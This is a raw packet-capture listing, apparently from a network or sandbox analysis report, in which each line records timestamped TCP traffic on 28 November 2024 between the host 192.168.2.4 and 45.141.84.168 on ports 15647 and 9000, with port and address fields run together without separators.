                                          Nov 28, 2024 13:40:11.453356028 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.453773975 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.495106936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.497752905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.574822903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.577748060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.579778910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.579857111 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.648005962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.649785042 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.700779915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.701081038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.776099920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.777760029 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.862572908 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.862633944 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.896012068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.896152020 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:11.897815943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.983190060 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:11.983247042 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.016154051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.016201973 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.022386074 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.022454023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.122873068 CET90004979345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.122953892 CET90004979345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.123020887 CET497939000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.123038054 CET497939000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.136224985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.136281013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.184554100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.184628963 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.235333920 CET497989000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.243185997 CET90004979345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.264106035 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.264178991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.337635994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.337779999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.355489969 CET90004979845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.355792046 CET497989000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.355925083 CET497989000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.434648991 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.434737921 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.457869053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.458259106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.460127115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.476450920 CET90004979845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.500356913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.578269005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.578440905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.585861921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.586015940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.709158897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.709232092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.756747961 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.756835938 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.874593973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.874654055 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.878870010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.878922939 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.902822018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.902893066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.910567045 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.910634041 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:12.998843908 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:12.998913050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.030670881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.030725956 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.034682989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.034753084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.150716066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.150774956 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.195987940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.196060896 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.316020012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.316188097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.320106030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.375387907 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.397126913 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.397195101 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.486618042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.489752054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.517224073 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.517349005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.517435074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.598326921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.598392010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.637305021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.637355089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.712222099 CET90004979845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.712344885 CET90004979845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.712398052 CET497989000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.712447882 CET497989000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.718533993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.718620062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.757275105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.757328033 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.813376904 CET498009000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.833101988 CET90004979845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.838537931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.838594913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.877266884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.877334118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.934546947 CET90004980045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.934618950 CET498009000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.934746027 CET498009000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.958956003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.959044933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:13.997371912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:13.997448921 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.054740906 CET90004980045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.078850985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.081773043 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.117861032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.121793032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.198731899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.201720953 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.241966009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.242279053 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.280412912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.280534983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.367660046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.371073008 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.403019905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.403121948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.450620890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.450687885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.496632099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.496691942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.523864985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.524003983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.574522972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.574660063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.643985033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.644229889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.697968006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.698223114 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.775924921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.776124001 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.862612009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.862806082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.896034956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.896290064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.898416042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.965523958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.965888023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:14.989475012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:14.989603043 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.020860910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.020937920 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.086973906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.087152958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.097096920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.097235918 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.141174078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.141596079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.190931082 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.190993071 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.217751980 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.217799902 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.290476084 CET90004980045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.290647984 CET90004980045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.290684938 CET498009000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.290713072 CET498009000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.302728891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.302779913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.312145948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.312566042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.359781027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.386682034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.386759043 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.407248974 CET498049000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.411123037 CET90004980045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.418979883 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.419054985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.422785044 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.511370897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.511421919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.533447981 CET90004980445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.533515930 CET498049000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.533655882 CET498049000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.539082050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.539150000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.598668098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.598722935 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.633626938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.633673906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.653594971 CET90004980445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.659192085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.659260035 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.712698936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.712760925 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.718660116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.753581047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.753632069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.779190063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.779262066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.832864046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.832922935 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.835053921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.891153097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.899090052 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.899169922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:15.920212030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:15.920285940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.002784014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.002962112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.019041061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.019104958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.034221888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.034308910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.082705021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.082787991 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.125087023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.125158072 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.139611006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.139663935 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.154236078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.154303074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.198694944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.198950052 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.202711105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.220393896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.221927881 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.259778976 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.259884119 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.314702988 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.314872026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.319278002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.319390059 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.340845108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.340941906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.381176949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.381344080 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.443124056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.443196058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.446480036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.501688004 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.501723051 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.501766920 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.583142042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.583290100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.662708998 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.662974119 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.703114033 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.703249931 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.706955910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.787921906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.788149118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.823214054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.823455095 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.843106985 CET90004980445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.843226910 CET90004980445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.843353033 CET498049000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.843465090 CET498049000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.870739937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.870835066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.908103943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.908247948 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.914861917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.945966959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.946075916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.954865932 CET498089000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:16.963222980 CET90004980445.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.990767002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:16.990835905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.028229952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.028347015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.031330109 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.074881077 CET90004980845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.075021982 CET498089000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.075093031 CET498089000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.081813097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.110956907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.111049891 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.147347927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.147433996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.194968939 CET90004980845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.201791048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.201841116 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.267424107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.267524958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.362773895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.362828016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.387386084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.387435913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.432566881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.432637930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.484980106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.485044956 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.509512901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.509584904 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.523977995 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.524064064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.588721037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.588819027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.633330107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.633383989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.690778971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.690825939 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.710738897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.710803032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.712074041 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.760076046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.760127068 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.815062046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.817876101 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.834877968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.837933064 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.926744938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.926798105 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.937823057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.958060026 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.958122015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:17.961440086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:17.961517096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.078102112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.078161955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.082894087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.082953930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.203633070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.203994036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.204212904 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.279366970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.279550076 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.366801023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.366889000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.399748087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.399837971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.400657892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.430738926 CET90004980845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.430861950 CET90004980845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.431014061 CET498089000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.431092024 CET498089000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.486851931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.489988089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.520219088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.520282984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.525875092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.533854008 CET498139000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.551322937 CET90004980845.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.578641891 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.641910076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.645935059 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.656167984 CET90004981345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:18.657984018 CET498139000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.658082008 CET498139000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:18.688222885 CET156474973045.141.84.168192.168.2.4
